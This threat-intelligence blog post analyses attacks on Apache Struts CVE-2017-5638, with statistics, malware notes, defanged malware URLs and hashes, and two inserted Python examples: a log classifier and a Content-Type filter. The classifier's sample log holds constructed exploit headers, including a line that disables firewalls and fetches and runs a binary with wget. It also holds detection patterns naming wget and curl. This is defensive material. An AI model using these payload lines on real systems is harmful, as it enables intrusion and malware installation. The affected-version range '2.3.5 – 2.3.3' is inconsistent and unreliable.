Apache Struts 2 Exploit Analysis

Data Analysis of CVE-2017-5638 Exploit Attempts

Terrance DeJesus

March 23, 2017 - Posted by Terrance DeJesus to Threat Intelligence

A major vulnerability in Apache Struts 2, the 0-day CVE-2017-5638, was discovered on March 6, 2017. Here at NTT Security, we analyze vulnerabilities of this kind, set up detection capabilities and analyze any exploit attempts by threat actors that are detected via the NTT Security Global Managed Security Services Platform.

This blog takes a closer look, through data analysis, at the active exploit attempts against the Apache Struts 2 0-day vulnerability as seen in the NTT Security Global Managed Security Services Platform. Through our analysis, we were able to uncover the source of the attacks, the industries targeted, malware samples, and more. Based on our research, we also concluded that exploit attempts for this vulnerability will remain popular for some time; mitigation and recommended actions to avoid future exploit attempts are listed further below in this blog.

Background

On March 6, Apache released a security advisory (S2-045) concerning a vulnerability (CVE-2017-5638) in Struts 2 that could allow remote code execution (RCE). On March 7, a security researcher released a proof of concept (PoC) on GitHub for an RCE attack using the Content-Type header of an HTTP request to an Apache Struts 2 server. The PoC targeted the Jakarta Multipart parser plugin of Apache Struts: a file-upload request whose Content-Type header carried specific code was enough to achieve RCE.

Apache Struts 2 (CVE-2017-5638) Exploit Analysis

After discovery of the exploit, NTT Security analyzed our MSSP data to identify any exploit attempts. Below are basic statistics gathered from the MSSP data from March 9 to March 17.

Log Count: 8320
Event Count: 6194
Daily Average Count: 1040
Unique Attack Sources: 351
Unique Attack Source Countries: 13
Destination Ports: 80, 8080, 8011, 7253, 5000, 7219, 443, 9001, 8009, 7080, 8081, 4848, 14100, 9093
Industries Targeted: Education (37%), Technology (5%), Finance (4%), Healthcare (28%), State/Local/Federal Government (<1%), Non-Profit (<1%), Manufacturing (2%), Retail (15%), Business Services (6%), Construction/Real Estate (<1%), Food/Beverage (<1%), Gaming/Entertainment (<1%)

NTT Security noticed exploit attempts almost immediately after signatures were installed. In Figure 1 below, the log count shows a slight decline up to March 12 before it continues to gradually increase over time, sharply increasing on March 17.

Figure 1: CVE-2017-5638 Log Count Over Time

A large increase in exploit attempts was attributed to servers hosted in China as shown in Figure 2 and Figure 3. Analysis shows 76 percent of all exploit attempts originated from China.

Figure 2: Attack Source Map

Figure 3: Attack Source Over Time

A further look into the post-exploit intentions of the Chinese sources shows that 69 percent attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. In some instances, wget was used but did not pull down any malicious binaries. These attempts let the threat actors track which servers are vulnerable and can retrieve additional binaries hosted on remote servers. Below is an example HTTP GET request from a server in China.

Figure 4: Example of HTTP Request Exploiting CVE-2017-5638

Additionally, specific HTTP POST requests contained mainAction.action in the URI. These requests were sent only from specific China-based servers, and each attempted to pull down Linux 32-bit and 64-bit malware, as shown in Figure 4. MainAction() appears to be a class inside of Apache Struts responsible for preparing business objects for main.jsp. NTT Security determined that these requests came only from Chinese sources, and that their post-exploit action was to download malware over port 110, the Post Office Protocol (POP) port; this activity could be used to bypass additional firewall rules. The malware names that NTT Security gathered ranged from UpTip60 through UpTip97. We triaged this information and determined that the activity behind these exploit attempts is still underway.

Exploit Intentions – Reconnaissance

We determined that post-exploit intentions were either to download malware, as shown in Figure 3, or to conduct reconnaissance. Reconnaissance accounted for 69 percent of all exploit attempts, but in a few instances threat actors attempted to disable local firewalls and download malware. Several payloads indicated that threat actors were attempting to use common Linux commands such as ifconfig, uname -r, echo and more. As stated previously, some of the payloads we analyzed used wget against a remote server page; this is believed to serve tracking purposes, as there was no attempt to change the permissions of any downloaded binary and no attempt to execute any local file. An example of this can be found in Figure 5.

Figure 5: Example of HTTP Request and wget Tracking

Exploit Intentions – Installation

As shown in Figure 4, several analyzed payloads showed attempts to disable local firewalls such as iptables and SuSEfirewall2. If the firewall was successfully disabled, the threat actors would then attempt to download malware from remote locations over specific ports. Malware hosts were located in the United States, China, and South Korea; however, as shown in Figure 6, the exploit attempts that included malware installation came only from servers in China and the United States, suggesting that the South Korean hosts were compromised servers. Further analysis of the data shows that malware hosted in South Korea was being requested during exploit attempts from China. Figure 6 is a bubble chart of the CVE-2017-5638 attack sources that also attempted to pull down malware; each bubble represents a remote malware host and the number of requests to it. As shown, Chinese sources attempted to pull malware from servers hosted in South Korea by the ISPs eHostIDC and KT Corporation.

Figure 6: Attack Source Country and Malware Correlation Chart. Each bubble represents the source of the attack and a unique malware host associated with it. The larger the bubble, the more malware retrieval attempts.
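The classification the three sections above describe (an OGNL-style expression in the Content-Type header, then a split of the payload's command into reconnaissance, wget-only tracking, or firewall-disable-and-install) can be reproduced over web-server or IDS logs. The script below is an added example, not NTT Security's tooling or data: the tab-separated log format, the RFC 5737 addresses, the non-functional OGNL fragments and the regular expressions that define each intent class are all constructed here, and the aggregation mirrors the kind of counts reported earlier on this page rather than the page's actual figures.

```python
import re
from collections import Counter

# Markers of the S2-045 pattern: an OGNL expression opener in the Content-Type
# header together with a reference to the Struts/OGNL context objects.
OGNL_OPENER = re.compile(r"[%$]\{")
OGNL_CONTEXT = re.compile(
    r"#_memberAccess|#context\b|@ognl\.OgnlContext@|xwork\.MethodAccessor", re.I
)

# Post-exploit command classes, following the breakdown used in the blog.
# These patterns are assumptions chosen for the example, not a vetted rule set.
FIREWALL_OR_INSTALL = re.compile(
    r"iptables\s+-F|/etc/init\.d/iptables\s+stop|SuSEfirewall2\s+stop|chmod\s+[+0-7]*x",
    re.I,
)
FETCH = re.compile(r"\b(?:wget|curl)\b", re.I)
RECON = re.compile(r"\b(?:ifconfig|uname|whoami|id|hostname|echo)\b", re.I)

# Constructed sample log (tab-separated): timestamp, source IP, source country,
# destination port, Content-Type header value. Addresses are RFC 5737 test
# ranges and the OGNL fragments are deliberately non-functional stand-ins.
SAMPLE_LOG = """\
2017-03-12T04:11:02Z\t203.0.113.5\tUS\t80\tmultipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
2017-03-12T04:11:09Z\t203.0.113.9\tCN\t8080\t%{(#_='multipart/form-data').(#context['CONSTRUCTED']=1).(#cmd='wget http://198.51.100.7/t.php')}
2017-03-12T04:12:30Z\t203.0.113.9\tCN\t80\t%{(#_='multipart/form-data').(#context['CONSTRUCTED']=1).(#cmd='/etc/init.d/iptables stop;SuSEfirewall2 stop;wget http://198.51.100.7:110/UpTip66;chmod +x UpTip66;./UpTip66')}
2017-03-13T09:02:11Z\t192.0.2.44\tKR\t8080\t%{(#_='multipart/form-data').(#context['CONSTRUCTED']=1).(#cmd='uname -r;ifconfig')}
2017-03-13T09:05:40Z\t203.0.113.5\tUS\t443\tapplication/json; charset=utf-8
2017-03-14T22:40:03Z\t203.0.113.9\tCN\t80\t${(#context['CONSTRUCTED']=1).(#cmd='echo CONSTRUCTED')}
"""


def classify(content_type):
    """Classify one Content-Type header value.

    Returns 'benign' when no OGNL markers are present, otherwise one of:
      'installation'   - firewall disable or chmod of a fetched file
      'tracking'       - a bare wget/curl with nothing done to the result
      'reconnaissance' - local commands only (ifconfig, uname -r, echo, ...)
      'unclassified'   - OGNL markers but no recognised command
    """
    if not (OGNL_OPENER.search(content_type) and OGNL_CONTEXT.search(content_type)):
        return "benign"
    if FIREWALL_OR_INSTALL.search(content_type):
        return "installation"
    if FETCH.search(content_type):
        return "tracking"
    if RECON.search(content_type):
        return "reconnaissance"
    return "unclassified"


def parse(log_text):
    """Parse the constructed tab-separated log into event dicts with an intent label."""
    events = []
    for line in log_text.strip().splitlines():
        ts, src, country, port, ctype = line.split("\t", 4)
        events.append({"ts": ts, "src": src, "country": country,
                       "port": int(port), "content_type": ctype,
                       "intent": classify(ctype)})
    return events


def summarize(events):
    """Aggregate the way the blog reports: attempt counts, unique sources, intent mix."""
    hits = [e for e in events if e["intent"] != "benign"]
    return {
        "events": len(events),
        "exploit_attempts": len(hits),
        "unique_sources": len({e["src"] for e in hits}),
        "source_countries": dict(Counter(e["country"] for e in hits)),
        "intent": dict(Counter(e["intent"] for e in hits)),
        "ports": sorted({e["port"] for e in hits}),
    }


if __name__ == "__main__":
    for key, value in summarize(parse(SAMPLE_LOG)).items():
        print(f"{key}: {value}")
```

Run against a real export, the only change needed is the `parse` function; the intent classes are ordered so that a payload which both fetches a file and disables the firewall counts as installation, not tracking, which is how the page distinguishes the two.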

Malware Overview:

We were able to retrieve several malware samples that threat actors attempted to install on vulnerable systems. These samples ranged from Perl DDoS bots to 32-bit and 64-bit ELF binaries. While analyzing the sample with hash value e6408aa9db0a1e09c8028f87d3a8f0cf, it was apparent that a targeted list of IP addresses was hardcoded into the binary. These IP addresses were identified as a list of DNS servers leveraged for the DNS amplification capabilities of this sample. As shown in Figure 7, the functions are specific in their use and intentions, with names such as CAttackIe and CAttackIcmp. Analysis and triage of these malware samples was still being conducted at the time of this writing.

Figure 7: e6408aa9db0a1e09c8028f87d3a8f0cf Hardcoded IPs and Functions

Predictive Analysis:

After analysis, we expect exploit attempts against CVE-2017-5638 to continue because of the simplicity of the vulnerability, the popularity of the product and the ability to execute code remotely. Probing attempts in which threat actors use wget to test whether retrieving additional files is possible on vulnerable machines indicate that threat actors will be targeting this list of hosts sooner rather than later.

Affected Systems:

  • Apache Struts versions 2.3.5 – 2.3.3
  • Apache Struts versions 2.5.0 – 2.5.10

Snort Signatures:

Figure 8: Snort Signatures

Mitigation and Recommended Actions:

  • Upgrade to Struts 2.3.32 or Struts 2.5.10.1
  • Implement a Servlet filter which will validate Content-Type and throw away requests with suspicious values not matching multipart/form-data
  • Change to a different multipart parser such as Pell or the parser from the Commons FileUpload library
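The second recommendation, a filter that validates Content-Type before the multipart parser sees it, is shown below as an added example rather than code from the advisory or from NTT Security. It is written as WSGI middleware in Python so it can be run here, but applies the same rule a Java Servlet filter would: a value that Struts would route to its multipart parser (one containing "multipart/form-data") must be a fully well-formed RFC 2046 multipart header, and everything else must at least be a plain RFC 7230 media type. The demo application, the `run_request` driver and the assumption that an absent header is passed through are mine.

```python
import re

# RFC 7230 token characters: what a plain media type and its parameter
# names/values may contain. '{', '}', '(' and ')' are excluded, so an
# OGNL expression can never satisfy this grammar.
TCHAR = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
GENERIC_OK = re.compile(rf"^{TCHAR}/{TCHAR}(?:\s*;\s*{TCHAR}={TCHAR})*\s*$")

# RFC 2046 boundary characters (1-70 of them; spaces only inside quotes).
BCHARS = r"0-9A-Za-z'()+_,\-./:=?"
BOUNDARY = rf"(?:\"[{BCHARS} ]{{1,70}}\"|[{BCHARS}]{{1,70}})"
MULTIPART_OK = re.compile(
    rf"^multipart/form-data\s*;\s*boundary={BOUNDARY}(?:\s*;\s*charset={TCHAR})?\s*$",
    re.IGNORECASE,
)


def content_type_is_acceptable(value):
    """Allowlist check mirroring the S2-045 Servlet-filter recommendation.

    Struts hands any Content-Type containing 'multipart/form-data' to its
    multipart parser, so such values must be a fully well-formed multipart
    header (boundary mandatory); everything else must be a plain media type.
    An absent or empty header is passed through, since there is no body to
    parse (an assumption of this example).
    """
    if value is None or not value.strip():
        return True
    if "multipart/form-data" in value.lower():
        return MULTIPART_OK.fullmatch(value) is not None
    return GENERIC_OK.fullmatch(value) is not None


class ContentTypeFilter:
    """WSGI middleware applying the check before the application runs."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if not content_type_is_acceptable(environ.get("CONTENT_TYPE")):
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [b"rejected: Content-Type is not a well-formed media type\n"]
        return self.app(environ, start_response)


def _demo_app(environ, start_response):
    """Stand-in for the protected application (hypothetical)."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok\n"]


def run_request(content_type):
    """Send one constructed POST through the filter; return (status, body)."""
    environ = {"REQUEST_METHOD": "POST", "PATH_INFO": "/upload.action"}
    if content_type is not None:
        environ["CONTENT_TYPE"] = content_type
    seen = {}

    def start_response(status, headers):
        seen["status"] = status

    body = b"".join(ContentTypeFilter(_demo_app)(environ, start_response))
    return seen["status"], body


if __name__ == "__main__":
    for ct in ["multipart/form-data; boundary=abc123",
               "application/json; charset=utf-8",
               "%{(#_='multipart/form-data').(#context['CONSTRUCTED']=1)}"]:
        print(run_request(ct)[0], "<-", ct)
```

In a Struts deployment the same two regular expressions go into a javax.servlet.Filter that reads `request.getHeader("Content-Type")` and calls `response.sendError(400)` instead of `chain.doFilter(...)` when the check fails. The allowlist approach matters more than the exact patterns: a filter that only blocks known OGNL markers would need updating for every encoding trick, whereas a value that is not a valid media type is rejected regardless of what it contains.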

Malware Hashes:

0132c766b1855c27819d9c108c7954c2
14782a44772c0b5fa69168b58ee6c9cd
58e50a7a0b76ce7601ae0096bb499d55
706b501e23b7dd3acac547daaa1298a2
7b2e2d5b06ed82d204a1d651a69d1845
cdc457633178e845bb4b306531a4588b
e6408aa9db0a1e09c8028f87d3a8f0cf
f8886fb4e56dbfd877eb8b8a5d125844

Malware Locations:

hxxp://65[.]254[.]63[.]20/[.]jb
hxxp://180[.]100[.]235[.]26:110/UpTip66
hxxp://180[.]150[.]226[.]202:8087/LG
hxxp://180[.]100[.]235[.]26:110/UpTip67
hxxp://aaa[.]linuxa[.]club:57843/linux
hxxp://192[.]161[.]172[.]197:367/com
hxxp://180[.]100[.]235[.]26:110/UpTip70
hxxp://180[.]100[.]235[.]26:110/UpTip69
hxxp://121[.]181[.]239[.]197:741/lin64
hxxp://107[.]179[.]45[.]9:8088/lol
hxxp://222[.]186[.]58[.]138:9278/Telenn
hxxp://65[.]254[.]63[.]20/ozoz
hxxp://192[.]161[.]172[.]197:60012/com
hxxp://192[.]161[.]172[.]197:352/VIP
hxxp://180[.]100[.]235[.]26:110/UpTip61
hxxp://122[.]114[.]2[.]17:8087/canager
hxxp://121[.]181[.]239[.]197:741/VIP

References:
http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
https://cwiki.apache.org/confluence/display/WW/S2-045
